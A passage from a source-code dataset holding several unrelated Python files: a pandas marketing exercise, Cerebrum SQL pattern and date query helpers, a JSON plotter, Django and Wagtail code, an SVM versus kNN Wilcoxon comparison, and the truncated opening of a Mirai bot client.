repetitive calculations. Anytime you notice repetition in your work, consider automation. The more of the\nlow-variance work you can automate, the more time you will have to explore new and interesting data science topics at work. This will\nboth impress your marketing stakeholders and be more fun!\n\nSince you know the format of the marketing DataFrame will remain the same over time, you can build a function to enable you to calculate\nconversion rate across any sub-segment you want on the fly.\n\nIn this exercise, you will build a function that takes a DataFrame and list of column names and outputs the conversion rate across the column(s).\n\nINTRUCTION:\nIsolate rows in the user inputted dataframe where users were converted, then group by the list of user inputted column_names and count\nthe number of unique converted users.\nGroup the user inputted dataframe by the list of user inputted column_names and calculate the total number of users.\nFill any missing values in conversion_rate with 0.\n'''\ndef conversion_rate(dataframe, column_names):\n # Total number of converted users\n column_conv = dataframe[dataframe['converted'] == True]\\\n .groupby(column_names)['user_id'].nunique()\n\n # Total number users\n column_total = dataframe.groupby(column_names)['user_id'].nunique()\n\n # Conversion rate\n conversion_rate = column_conv/column_total\n\n # Fill missing values with 0\n conversion_rate = conversion_rate.fillna(0)\n return conversion_rate\n\n","repo_name":"GitBulk/datacamp","sub_path":"marketing analytics with python/01 analyzing marketing campaigns with pandas/12_building_a_conversion_function.py","file_name":"12_building_a_conversion_function.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20854498667","text":"#!/usr/bin/env python\ntry:\n\tfrom kast import ast_export\nexcept:\n\tprint(\"What gives\")\nfrom parser_test_helper import *\n\n@SkippingTest\nclass CompilerPythonEquivalenceTest: # (ParserBaseTest):\n\tdef test_compiler_output_equivalence(self):\n\t\tskip()\n\t\tsource = '../kast/tests/hi.py'\n\t\t# source='../core/english_parser.py'\n\t\tcontents = open(source).readlines() # all()\n\t\tcontents = \"\\n\".join(contents)\n\t\tcontents = \"print('hi')\"\n\t\tinline = \"(string)\" # compile from inline string source:\n\t\tsource = inline\n\t\tparse(contents)\n\t\tfile_ast = compile(contents, source, 'exec', ast.PyCF_ONLY_AST)\n\t\t# x=ast.dump(file_ast, annotate_fields=True, include_attributes=True)\n\t\tangle_ast = parse_tree(contents)\n\t\tprint((ast.dump(file_ast, annotate_fields=False, include_attributes=False)))\n\t\tprint((ast.dump(angle_ast, annotate_fields=False, include_attributes=False)))\n\t\tassert_equals(file_ast, angle_ast)\n\t\tcode = compile(angle_ast, 'file', 'exec')\n\t\tif source == inline:\n\t\t\tast_export.emit_pyc(code)\n\t\telse:\n\t\t\tast_export.emit_pyc(code, source + \".pyc\")\n\t\ttry:\n\t\t\texec(code)\n\t\texcept:\n\t\t\tpass\n\n#\n# try:\n# \tCompilerPythonEquivalenceTest().test_compiler_output_equivalence()\n# except:\n# \tpass\n","repo_name":"pannous/angle","sub_path":"tests/compiler_test.py","file_name":"compiler_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"78"} +{"seq_id":"43243809965","text":"from __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\n\nimport six\n\nfrom Cerebrum.Utils import NotSet, argument_to_sql\nfrom Cerebrum.utils import reprutils\n\n\ndef _not_none(value):\n \"\"\"\n Check that value is not None/NotSet.\n\n This is typically used as transform-callback in\n ``argument_to_sql`` if no other transforms are suitable.\n \"\"\"\n if value is None:\n raise ValueError(\"unexpected None-value\")\n if value is NotSet:\n raise ValueError(\"unexpected NotSet-value\")\n return value\n\n\nclass _Range(object):\n \"\"\"\n Abstract range (lower/upper limits).\n\n Note that if both a gt/ge and a lt/le is given, then the two\n values must be comparable.\n \"\"\"\n def __init__(self, gt=None, ge=None, lt=None, le=None):\n gt = self._convert(gt)\n ge = self._convert(ge)\n if gt is not None and ge is not None:\n raise TypeError('invalid range: gt/ge is incompatible')\n\n self.start = ge if gt is None else gt\n self.start_inclusive = gt is None\n\n lt = self._convert(lt)\n le = self._convert(le)\n if lt is not None and le is not None:\n raise TypeError('invalid range: lt/le is incompatible')\n\n self.stop = le if lt is None else lt\n self.stop_inclusive = lt is None\n\n if all(i is None for i in (self.start, self.stop)):\n raise TypeError('invalid range: must provide a limit')\n\n if (self.start is not None\n and self.stop is not None\n and self.start > self.stop):\n raise ValueError('invalid range: start >= stop')\n\n def __repr__(self):\n pairs = []\n if self.start is not None:\n pairs.append(('ge' if self.start_inclusive else 'gt', self.start))\n if self.stop is not None:\n pairs.append(('le' if self.stop_inclusive else 'lt', self.stop))\n pretty = ' '.join(attr + '=' + repr(value) for attr, value in pairs)\n return '<{name} {fields}>'.format(name=type(self).__name__,\n fields=pretty)\n\n def _convert(self, value):\n if value is None:\n return None\n return value\n\n def get_sql_select(self, colname, ref):\n binds = {}\n conds = []\n ref_start = ref + '_start'\n ref_stop = ref + '_stop'\n\n if self.start is not None:\n start_op = '>=' if self.start_inclusive else '>'\n conds.append('{} {} :{}'.format(colname, start_op, ref_start))\n binds[ref_start] = self.start\n if self.stop is not None:\n stop_op = '<=' if self.stop_inclusive else '<'\n conds.append('{} {} :{}'.format(colname, stop_op, ref_stop))\n binds[ref_stop] = self.stop\n return '({})'.format(' AND '.join(conds)), binds\n\n\nclass NumberRange(_Range):\n\n def _convert(self, value):\n if value is None:\n return None\n return int(value)\n\n\n# class DateRange(_Range):\n# pass\n\n\n# class DatetimeRange(_Range):\n# pass\n\n\nclass Pattern(reprutils.ReprFieldMixin):\n r\"\"\"\n Simplified Cerebrum pattern matching.\n\n The Cerebrum user input pattern is a simple glob-like pattern:\n\n - '*' matches zero or more characters\n - '?' matches a single character\n - '\\*' matches a literal '*'\n - '\\?' matches a literal '?'\n - '\\\\' matches a literal '\\'\n\n\n To query database using Pattern:\n\n >>> Pattern(r\"Foo-*\", case_sensitive=False).get_sql_select('col', 'ref')\n ('(col ILIKE :ref)', {'ref': 'Foo-%'})\n\n >>> Pattern(r\"% _\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '\\\\% \\\\_'})\n\n >>> Pattern(r\"* ?\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '% _'})\n\n >>> Pattern(r\"\\* \\?\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '* ?'})\n \"\"\"\n\n repr_id = False\n repr_module = False\n repr_fields = ('pattern', 'case_sensitive')\n\n TOKEN_STRING = 'string'\n TOKEN_WILDCARD = 'wildcard'\n WILDCARDS = {\n '*': '%',\n '?': '_',\n }\n\n @classmethod\n def _sql_escape(cls, value):\n for char in cls.WILDCARDS.values():\n value = value.replace(char, '\\\\' + char)\n return value\n\n @classmethod\n def tokenize(cls, pattern, escape='\\\\'):\n \"\"\" tokenize input pattern.\n\n Tokenizes the cerebrum pattern. The un-escaped '*' and '?' are the\n only possible matches for the 'wildcard' token.\n\n :param pattern:\n A pattern (e.g. `ba?-*`)\n\n :rtype: generator\n :returns:\n yields pairs of , \n \"\"\"\n buffer = ''\n is_escaped = False\n for charno, char in enumerate(pattern, 1):\n if is_escaped:\n buffer += char\n is_escaped = False\n continue\n\n if char == escape:\n is_escaped = True\n continue\n\n if char in cls.WILDCARDS:\n if buffer:\n yield cls.TOKEN_STRING, buffer\n yield cls.TOKEN_WILDCARD, char\n buffer = ''\n else:\n buffer += char\n if is_escaped:\n # the last character was an un-escaped escape\n raise ValueError('invalid pattern (%d): %s' %\n (charno, repr(pattern)))\n if buffer:\n yield cls.TOKEN_STRING, buffer\n\n @classmethod\n def dwim(cls, pattern):\n \"\"\"\n Get a new pattern that auto selects case sensitivity.\n\n DWIM - Do What I Mean - sets case_sensitive=True if the pattern\n contains upper case characters.\n \"\"\"\n return cls(pattern, pattern != pattern.lower())\n\n def __init__(self, pattern, case_sensitive=True):\n \"\"\"\n :param pattern: A simple cerebrum search pattern.\n :param case_sensitive: If case sensitive matching should be used\n \"\"\"\n self._raw_pattern = pattern\n self._tokens = tuple(self.tokenize(pattern))\n self.case_sensitive = case_sensitive\n\n @property\n def pattern(self):\n \"\"\" input pattern, as provided. \"\"\"\n return self._raw_pattern\n\n @property\n def tokens(self):\n \"\"\" tokenized tuples. \"\"\"\n return self._tokens\n\n @property\n def sql_pattern(self):\n \"\"\" sql LIKE/ILIKE formatted pattern string. \"\"\"\n return ''.join(self.WILDCARDS[value]\n if token == self.TOKEN_WILDCARD\n else self._sql_escape(value)\n for token, value in self._tokens)\n\n def get_sql_select(self, colname, ref):\n \"\"\"\n Get SQL matching rule for this pattern.\n\n >>> Pattern('ba?-*', False).get_sql_select('my_t.my_col', 'my_val')\n ('(my_t.my_col ILIKE :my_val)', {'my_val': 'ba_-%'})\n\n :param colname: the column name to match\n :param ref: the binding name to use\n\n :rtype: tuple\n :returns:\n A tuple with: (, )\n \"\"\"\n op = 'LIKE' if self.case_sensitive else 'ILIKE'\n cond = '({} {} :{})'.format(colname, op, ref)\n binds = {ref: self.sql_pattern}\n return cond, binds\n\n\ndef pattern_helper(colname,\n value=NotSet,\n case_pattern=None,\n icase_pattern=None,\n nullable=False):\n \"\"\"\n Helper to prepare a string column query condition.\n\n Helps to generate conditions for matching exact string values, string\n patterns, or NULL.\n\n >>> pattern_helper(\"foo\", (\"bar\", \"baz\"), None, \"bar baz*\")\n (\n \"(foo IN (:foo0, :foo1) OR foo ILIKE :foo_i_pattern)\",\n {'foo0': 'bar', 'foo1': 'baz', 'foo_i_pattern': 'bar baz%'},\n )\n\n >>> pattern_helper(\"x.foo\", None, \"*Bar?\", nullable=True)\n (\n \"(x.foo IS NULL OR x.foo LIKE :x_foo_c_pattern)\",\n {'x_foo_c_pattern': '%Bar_'}\n )\n\n :param str colname: column name (with prefix, e.g. \"en.entity_name\")\n :param str value: value check (sequence of strings, string, None, NotSet)\n :param str case_pattern: case-sensitive pattern\n :param str icase_pattern: case-insensitive pattern\n :param bool nullable:\n If True, a (column IS NULL) OR-condition is added when `value is None`.\n This is usually what you want if the column allows NULL-values.\n \"\"\"\n conds = []\n binds = {}\n\n if nullable and value is None:\n conds.append(\"{} IS NULL\".format(colname))\n\n elif value is not None and value is not NotSet:\n conds.append(\n argument_to_sql(value, colname, binds, six.text_type))\n\n bind_like = colname.replace('.', '_') + '_c_pattern'\n bind_ilike = colname.replace('.', '_') + '_i_pattern'\n\n # case-sensitive pattern\n if case_pattern:\n c_pattern = Pattern(case_pattern, case_sensitive=True)\n c_cond, c_bind = c_pattern.get_sql_select(colname, bind_like)\n conds.append(c_cond)\n binds.update(c_bind)\n\n # case-insensitive pattern\n if icase_pattern:\n i_pattern = Pattern(icase_pattern, case_sensitive=False)\n i_cond, i_bind = i_pattern.get_sql_select(colname, bind_ilike)\n conds.append(i_cond)\n binds.update(i_bind)\n\n if len(conds) > 1:\n return '({})'.format(' OR '.join(conds)), binds\n elif conds:\n return conds[0], binds\n return None, {}\n\n\ndef date_helper(colname, value=NotSet, gt=None, ge=None, lt=None, le=None,\n nullable=False):\n \"\"\"\n Helper to prepare a date/timestamp column query condition.\n\n Helps to generate conditions for matching exact date/datetime values,\n date/datetime ranges, or NULL.\n\n >>> a, b, c = (datetime.date(2023, 4, i) for i in (15, 17, 19))\n >>> date_helper(\"foo\", (a, b), ge=c)\n (\n '((foo IN (:foo0, :foo1)) OR (foo >= :foo_range_start))',\n {'foo0': datetime.date(2023, 4, 15),\n 'foo1': datetime.date(2023, 4, 17),\n 'foo_range_start': datetime.date(2023, 4, 19)})\n\n >>> date_helper(\"foo\", None, gt=a, lt=b)\n (\n '(foo > :foo_range_start AND foo < :foo_range_stop)',\n {'foo_range_start': datetime.date(2023, 4, 15),\n 'foo_range_stop': datetime.date(2023, 4, 17)})\n\n :param str colname: column name (with prefix, e.g. \"en.entity_name\")\n :param value: value check (sequence of dates, date, None, NotSet)\n :param gt/ge: add range start condition (exclusive/inclusive)\n :param lt/le: add range end condition (exclusive/inclusive)\n :param bool nullable:\n If True, a (column IS NULL) OR-condition is added when `value is None`.\n This is usually what you want if the column allows NULL-values.\n \"\"\"\n conds = []\n binds = {}\n\n if nullable and value is None:\n conds.append(\"{} IS NULL\".format(colname))\n\n if value is not None and value is not NotSet:\n conds.append(\n argument_to_sql(value, colname, binds, _not_none))\n\n if any((lt, le, gt, ge)):\n bind_prefix = colname.replace('.', '_') + '_range'\n date_range = _Range(gt=gt, ge=ge, lt=lt, le=le)\n r_cond, r_bind = date_range.get_sql_select(colname, bind_prefix)\n conds.append(r_cond)\n binds.update(r_bind)\n\n if len(conds) > 1:\n return '({})'.format(' OR '.join(conds)), binds\n elif conds:\n return conds[0], binds\n return None, {}\n","repo_name":"unioslo/cerebrum","sub_path":"Cerebrum/database/query_utils.py","file_name":"query_utils.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"69861702974","text":"import json\r\nimport sys\r\n#import matplotlib as mpl\r\n#mpl.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\ndef load_json_file(path):\r\n\twith open(path, 'r') as file:\r\n\t\tjson_text = file.read()\r\n\treturn json_text\r\n\r\ndef plot_json(json_session):\r\n\tsession_dict = json.loads(json_session)\r\n\tnum_plots = session_dict['num_plots']\r\n\tfor i in range(num_plots):\r\n\t\tfig = plt.figure()\r\n\t\taxes = fig.add_subplot(1,1,1)\r\n\t\tlabel = 'plot_%d' % (i,)\r\n\t\tplot_dict = session_dict[label]\r\n\t\tnum_lines = plot_dict['num_lines']\r\n\t\tfor j in range(num_lines):\r\n\t\t\tlabel_ = 'line_%d' % (j,)\r\n\t\t\tline = plot_dict[label_]\r\n\t\t\tx = line['x']\r\n\t\t\ty = line['y']\r\n\t\t\taxes.plot(x, y, label=line['label'], picker=5)\r\n\t\taxes.grid(True)\r\n\t\taxes.legend(loc='best')\r\n\t\taxes.set_xlabel(plot_dict['xlabel'])\r\n\t\taxes.set_ylabel(plot_dict['ylabel'])\r\n\t\taxes.set_title(plot_dict['title'])\r\n\t\taxes.set_xlim(plot_dict['x_lim'])\r\n\t\taxes.set_ylim(plot_dict['y_lim'])\r\n\t\tfig.show() # Keeps Each plot in it's own window\r\n\tplt.show() # Blocks so the plots stay up until the user closes them\r\n\r\nif __name__ == '__main__':\r\n\targv = sys.argv[1:]\r\n\tif len(argv) < 1:\r\n\t\tprint( 'Please enter path to the json file you would like to plot.' )\r\n\telif len(argv) > 1:\r\n\t\tprint( 'Too many command line arguments. Please only enter the path to the json flie.' )\r\n\telse:\r\n\t\tpath = argv[0]\r\n\t\ttext = load_json_file(path)\r\n\t\tplot_json(text)\r\n\r\n\r\n\r\n","repo_name":"cram869/Splotter","sub_path":"util/Json_Plotter.py","file_name":"Json_Plotter.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11966531605","text":"from apps.accounts.factories import UserFactory\nfrom apps.core.test import TestCase\n\n\nclass UserTestCase(TestCase):\n \"\"\"Test case for User model.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"Common test data.\"\"\"\n cls.user_without_name = UserFactory.create()\n cls.user_with_name = UserFactory.create(first_name=\"John\", last_name=\"Doe\")\n\n def test_user_with_name_str(self):\n \"\"\"Test that the user return the join of first and last name.\"\"\"\n self.assertEqual(\n str(self.user_with_name),\n (\n \"%s %s\"\n % (self.user_with_name.first_name, self.user_with_name.last_name)\n ).strip(),\n )\n\n def test_user_without_name_str(self):\n \"\"\"Test that the user return the username if has no first_name.\"\"\"\n self.assertEqual(str(self.user_without_name), self.user_without_name.username)\n","repo_name":"UHo-GPDB/sigipo","sub_path":"apps/accounts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40472082315","text":"import random\n\nimport scipy\n\nimport ITMO.knn.functions.kernel as kernels_knn\nimport ITMO.knn.functions.distance as distances\nimport numpy as np\n\nfrom ITMO.SVM import kernels\nfrom ITMO.SVM.svm import SVMClassifier\nfrom ITMO.NewShinyNaiveBayes.Metrics import Metrics\nfrom ITMO.knn.dataset import Point\nfrom ITMO.knn.knn import WeightedKNNClassifier\nfrom ITMO.util import read_csv, normalize\n\nfrom sklearn import svm\n\n\ndef make_dataset(table, shuffle=False):\n samples_x = list()\n samples_labels = list()\n if shuffle:\n np.random.shuffle(table)\n for row in table:\n samples_x.append(list(map(float, row[:-1])))\n samples_labels.append(int(row[-1]))\n return samples_x, samples_labels\n\n\ndef split_dataset(samples, ratio):\n random.shuffle(samples)\n train_size = int(len(samples) * ratio)\n return samples[:train_size], samples[train_size:]\n\n\ndef k_fold_cross_validation(samples, classifier,\n accuracy_measure, k_fold=10,\n verbose=False):\n def split_dataset_k_fold(xs, ys, k_fold, k):\n train_data_x = []\n train_data_y = []\n test_data_x = []\n test_data_y = []\n\n from_ = k * len(xs) // k_fold\n to = (k + 1) * len(xs) // k_fold\n\n for idx, (x, y) in enumerate(zip(xs, ys)):\n if from_ <= idx < to:\n test_data_x.append(x)\n test_data_y.append(y)\n else:\n train_data_x.append(x)\n train_data_y.append(y)\n\n return (train_data_x, train_data_y), (test_data_x, test_data_y)\n\n accuracy_sum = 0\n xs, ys = samples\n\n for k in range(k_fold):\n train_data, test_data = split_dataset_k_fold(xs, ys, k_fold, k)\n classifier.fit(train_data[0], train_data[1])\n predicted_data = classifier.predict(test_data[0])\n if verbose:\n pred = [max(0, y) for y in predicted_data]\n real = [max(0, y) for y in test_data[1]]\n print('k:', k, real, pred, accuracy_measure(test_data[1], predicted_data))\n accuracy_sum += accuracy_measure(test_data[1], predicted_data)\n\n return accuracy_sum / k_fold\n\n\ndef count_bicentral(samples, bic_a, mean=False):\n bicentral_samples = []\n means = [0 for _ in samples[0]]\n if mean:\n for idx in range(len(means)):\n means[idx] = np.mean([sample[idx] for sample in samples])\n for sample in samples:\n sample.coords[idx] -= means[idx]\n for sample in samples:\n bicentral_samples.append(\n [np.sqrt(sum([pow(coord - bic_a,2) for coord in sample])),\n np.sqrt(sum([pow(coord + bic_a,2) for coord in sample]))])\n return bicentral_samples\n\n\ndef calc_wilcoxon(samples, classifier_svm: SVMClassifier, classifier_knn: WeightedKNNClassifier,\n accuracy_measure, k_fold=10,\n verbose=False, alpha=0.05):\n\n def split_dataset_k_fold(xs, ys, k_fold, k):\n train_data_x = []\n train_data_y = []\n test_data_x = []\n test_data_y = []\n\n from_ = k * len(xs) // k_fold\n to = (k + 1) * len(xs) // k_fold\n\n for idx, (x, y) in enumerate(zip(xs, ys)):\n if from_ <= idx < to:\n test_data_x.append(x)\n test_data_y.append(y)\n else:\n train_data_x.append(x)\n train_data_y.append(y)\n\n return (train_data_x, train_data_y), (test_data_x, test_data_y)\n\n def convert2points(data):\n points = []\n for coords, label in zip(data[0], data[1]):\n points.append(Point(0 if label == -1 else 1, coords))\n return points\n\n will_acc_knn = []\n will_acc_svm = []\n accuracy_sum_knn = 0\n accuracy_sum_svm = 0\n xs, ys = samples\n\n for k in range(k_fold):\n train_data, test_data = split_dataset_k_fold(xs, ys, k_fold, k)\n train_data_knn, test_data_knn = convert2points(train_data), convert2points(test_data)\n\n classifier_svm.fit(train_data[0], train_data[1])\n classifier_knn.fit(train_data_knn, 2)\n\n predicted_data_svm = classifier_svm.predict(test_data[0])\n predicted_data_knn = classifier_knn.test_dataset(test_data_knn)\n\n predicted_data_knn = [-1 if y.label == 0 else 1 for y in predicted_data_knn]\n test_data_knn = [-1 if y.label == 0 else 1 for y in test_data_knn]\n\n if verbose:\n pred = [max(0, y) for y in predicted_data_svm]\n real = [max(0, y) for y in test_data[1]]\n\n print('knn k:', k, accuracy_measure(test_data_knn, predicted_data_knn))\n print('svm k:', k, accuracy_measure(test_data[1], predicted_data_svm))\n print()\n\n accuracy_sum_knn += accuracy_measure(test_data_knn, predicted_data_knn)\n accuracy_sum_svm += accuracy_measure(test_data[1], predicted_data_svm)\n\n will_acc_knn.append(accuracy_measure(test_data_knn, predicted_data_knn))\n will_acc_svm.append(accuracy_measure(test_data[1], predicted_data_svm))\n\n values = []\n abs_values = []\n\n for knn, svm_meas in zip(will_acc_knn, will_acc_svm):\n values.append(knn-svm_meas)\n abs_values.append(np.abs(knn-svm_meas))\n\n all_values = sorted(zip(abs_values, values), key=lambda _val: _val[0])\n cut_values = []\n cnt = 0\n cnt_pos = 0\n cnt_neg = 0\n\n mean_svm, var_svm = np.mean(will_acc_svm), np.var(will_acc_svm)\n mean_knn, var_knn = np.mean(will_acc_knn), np.var(will_acc_knn)\n\n print(mean_svm, var_svm)\n\n mean_svm, var_svm, mean_knn, var_svm = 0, 1, 0, 1\n\n p = 1 - alpha\n\n crit_value_svm = mean_svm+np.sqrt(2*var_svm)*scipy.special.erfinv(2*p-1)\n crit_value_knn = mean_knn+np.sqrt(2*var_knn)*scipy.special.erfinv(2*p-1)\n print((crit_value_knn+crit_value_svm)/2)\n\n for val in all_values:\n if val[0] != 0:\n if not cut_values or val[0] != cut_values[-1][0]:\n cnt += 1\n cut_values.append([val[0], val[1], cnt])\n if val[1] < 0:\n cnt_neg += 1\n else:\n cnt_pos += 1\n ch_sum = 0\n for val in cut_values:\n if cnt_pos > cnt_neg:\n if val[1] < 0:\n ch_sum += val[2]\n else:\n if val[1] > 0:\n ch_sum += val[2]\n print(\"Willcoxon: \", ch_sum)\n print('knn: {}\\nsvm: {}'.format(accuracy_sum_knn/k_fold, accuracy_sum_svm/k_fold))\n\n\nN_NEIGHBORS = 10\nDISTANCE_METRIC = distances.euclidean\nKERNEL = kernels_knn.epanechnikov\n\n\ndef main():\n table = read_csv('../knn/dataset.txt', '\\t')\n\n xs, ys = make_dataset(table, shuffle=True)\n # xs, _, _ = list(normalize(np.array(xs)))\n xs = count_bicentral(xs, 0.25)\n ys = [-1 if y == 0 else 1 for y in ys]\n\n # classifier = svm.SVC(C=50, gamma='scale', )\n # classifier.fit(xs, ys)\n\n classifier = WeightedKNNClassifier(N_NEIGHBORS, DISTANCE_METRIC, KERNEL)\n # classifier2 = SVMClassifier(C=5, kernel=kernels.Polynomial(2, gamma=1, coef0=1))\n classifier2 = SVMClassifier(C=5, kernel=kernels.RadialBasis(sigma=0.3))\n\n # classifier = SVMClassifier(C=2, kernel=kernels.Polynomial(2, gamma=(1/len(xs))))\n # ans = k_fold_cross_validation((xs, ys), classifier2, Metrics.f_score2, k_fold=9, verbose=False)\n # print(ans)\n calc_wilcoxon((xs, ys), classifier_knn=classifier, classifier_svm=classifier2\n ,accuracy_measure=Metrics.f_score2, k_fold=9, verbose=True)\n\n\nif __name__ == '__main__':\n np.random.seed(42)\n main()\n","repo_name":"dxahtepb/ml-and-stuff","sub_path":"ITMO/SVM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36810365478","text":"\"\"\"Streamfields live in here\"\"\"\n\nfrom wagtail.core import blocks\n\nfrom wagtail.images.blocks import ImageChooserBlock\n\n\nclass BannerBlock(blocks.StructBlock):\n \"\"\"\n A banner block that allows the user to add a title, subtitle, and background image.\n \"\"\"\n title = blocks.CharBlock(required=True, max_length=255)\n subtitle = blocks.CharBlock(required=True, max_length=255)\n image = ImageChooserBlock(required=True) \n image_size = blocks.ChoiceBlock(choices=[\n ('auto', 'Auto'),\n ('cover', 'Cover'),\n ('contain', 'Contain'),\n ], default='cover', required=True)\n\n button_url = blocks.CharBlock(label=\"Button URL\", help_text='Add the url for the button')\n\n class Meta:\n template = \"streams/banner.html\"\n icon = \"image\"\n label = \"Banner\"\n\n\nclass ImageSection(blocks.StructBlock):\n \"\"\" \n Image Section with description\n \"\"\" \n \n card = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"image\", ImageChooserBlock(required=True)),\n (\"title\", blocks.CharBlock(required=True, max_length=40)),\n (\"text\", blocks.TextBlock(required=True, max_length=200)), \n ]\n )\n )\n\n class Meta:\n template = \"streams/image_block.html\"\n icon = \"edit\"\n label = \"Attractions\" \n\nclass CarouselBlock(blocks.StructBlock):\n \"\"\"\n A carousel block that allows the user to add images and captions to the carousel.\n \"\"\"\n\n title = blocks.CharBlock(required=True, help_text='Add title')\n subtitle = blocks.CharBlock(required=True, help_text='Add subtitle') \n\n\n images = blocks.ListBlock(\n blocks.StructBlock([\n ('image', ImageChooserBlock(required=True)),\n ('caption', blocks.CharBlock(required=False, max_length=255)),\n ])\n )\n autoplay = blocks.BooleanBlock(\n required=False,\n default=True,\n help_text='Autoplay the carousel on page load.'\n )\n interval = blocks.IntegerBlock(\n required=False,\n default=3000,\n help_text='Interval between slides in milliseconds.'\n )\n\n class Meta:\n template = \"streams/carousel.html\"\n icon = \"image\"\n label = \"Carousel\"\n \n\nclass TitleAndSubtitle(blocks.StructBlock):\n \"\"\"Title and subtitle\"\"\"\n\n title = blocks.CharBlock(required=True, help_text='Add title') \n\n title_class_name = blocks.ChoiceBlock(choices=[\n ('fw-light', 'FW-LIGHT'),\n ('text-white', 'TEXT-WHITE'),\n ]) \n\n subtitle = blocks.CharBlock(required=True, help_text='Add subtitle') \n\n subtitle_class_name = blocks.ChoiceBlock(choices=[\n ('lead text-muted', 'LEAD TEXT-MUTED'),\n ('text-muted', 'TEXT-MUTED'),\n ])\n\n heading_level = blocks.ChoiceBlock(choices=[\n ('h1', 'H1'),\n ('h2', 'H2'),\n ('h3', 'H3'),\n ('h4', 'H4'),\n ('h5', 'H5'),\n ('h6', 'H6'),\n ], default='h1') \n\n class Meta:\n template = \"streams/title_subtitle.html\"\n icon = \"edit\"\n label = \"Title & subtitle\" \n\nclass RichtextBlock(blocks.RichTextBlock):\n \"\"\"Richtext with all the features\"\"\"\n\n class Meta:\n template = \"streams/richtext_block.html\"\n icon = \"edit\"\n label = \"Full RichText\"\n\nclass CardBlock(blocks.StructBlock):\n \"\"\" Image and description\"\"\" \n \n cards = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"image\", ImageChooserBlock(required=True)),\n (\"title\", blocks.CharBlock(required=True, max_length=40)),\n (\"text\", blocks.TextBlock(required=True, max_length=200)),\n \n ]\n )\n )\n\n class Meta:\n template = \"streams/card_block.html\"\n icon = \"placeholder\"\n label = \"Images\"\n\n\nclass Footer(blocks.StructBlock):\n ''' Footer block '''\n\n year = blocks.IntegerBlock(required=True, default='2023')\n company_name = blocks.CharBlock(required=True, default='Company Name')\n\n class Meta:\n template = \"streams/footer.html\" \n\nclass NewsSection(blocks.StructBlock):\n \"\"\"News section with title, description and list of articles\"\"\"\n\n title = blocks.CharBlock(required=True)\n description = blocks.RichTextBlock(required=True, help_text='Add a short description of the news section')\n articles = blocks.ListBlock(blocks.StructBlock([\n ('title', blocks.CharBlock(required=True)),\n ('date', blocks.DateBlock(required=True)),\n ('image', ImageChooserBlock()),\n ('summary', blocks.RichTextBlock(required=True)), \n ]))\n\n class Meta:\n template = 'streams/news_section.html'\n icon = 'folder-open'\n label = 'News Section'\n","repo_name":"PaulStaniewski/wagtail-website","sub_path":"streams/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24829700038","text":"import json\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport atexit\n\nimport requests as req\nfrom rich.console import Console\n\nfrom easyMirai.sendType import sendTypeMode\nfrom easyMirai.getType import getTypeMode\nfrom easyMirai.setType import setTypeMode\nfrom easyMirai.uploadType import uploadTypeMode\nfrom easyMirai.actionType import actionTypeMode\nfrom easyMirai.eventType import eventTypeMode\n\nfrom easyMirai.__version__ import __version__\n\n_config = {\n \"about\": \"/about\",\n \"verify\": \"/verify\",\n \"bind\": \"/bind\",\n \"release\": \"/release\",\n \"data\": {\n \"url\": \"\",\n \"session\": \"\",\n \"botId\": \"\"\n }\n}\n\n\nclass Init:\n def __init__(self, host: str, port: str, botId: str, key: str, maxWork: int = 8, isSlice: bool = False):\n self._host: str = host\n self._port: str = port\n self._botId: str = botId\n self._key: str = key\n self._session: str = \"\"\n self._c = Console()\n self._url = self._host + \":\" + self._port # 格式化Bot HTTP API地址\n self.__version__ = __version__\n self._c.log(\"[Notice]:当前easyMirai版本为 \" + self.__version__, style=\"#a4ff8f\")\n self._c.log(\"[Notice]:项目文档&使用教程:https://github.com/easyMirais/easyMirai/wiki\", style=\"#a4ff8f\")\n self._testServer()\n self._pool = self._createPool(maxWork) # 创建线程池\n self._beginSession()\n self._isSlice = isSlice\n\n _config[\"data\"][\"url\"] = self._url\n _config[\"data\"][\"botId\"] = self._botId\n _config[\"data\"][\"session\"] = self._session\n\n def _testServer(self):\n # 测试服务器是否正常开启\n try:\n request = req.get(url=self._url + _config[\"about\"], timeout=5)\n except Exception as re:\n request = re\n self._c.log(\"[Alert]:地址或端口有误,详细:未查询到Mirai HTTP服务器\", style=\"#fb48a0\")\n exit(404)\n if request.status_code == 200:\n data = json.loads(request.text)\n if data[\"code\"] == 0:\n version = data[\"data\"][\"version\"]\n self._c.log(\"[Notice]:当前Mirai-HTTP-API版本为 \" + version + \" ,详细: 已查询到Mirai HTTP服务器\", style=\"#a4ff8f\")\n\n def _createPool(self, maxWork: int):\n pool = ThreadPoolExecutor(maxWork)\n self._c.log(\"[Notice]:成功创建容量为 \" + str(maxWork) + \" 的线程池\", style=\"#a4ff8f\")\n return pool\n\n def _beginSession(self):\n data = {\n \"verifyKey\": self._key\n }\n data = req.post(url=self._url + _config[\"verify\"], data=json.dumps(data))\n if data.status_code == 200:\n data = json.loads(data.text)\n if data[\"code\"] == 0:\n self._session = data[\"session\"]\n else:\n self._c.log(\"[Error]:获取Session失败\", 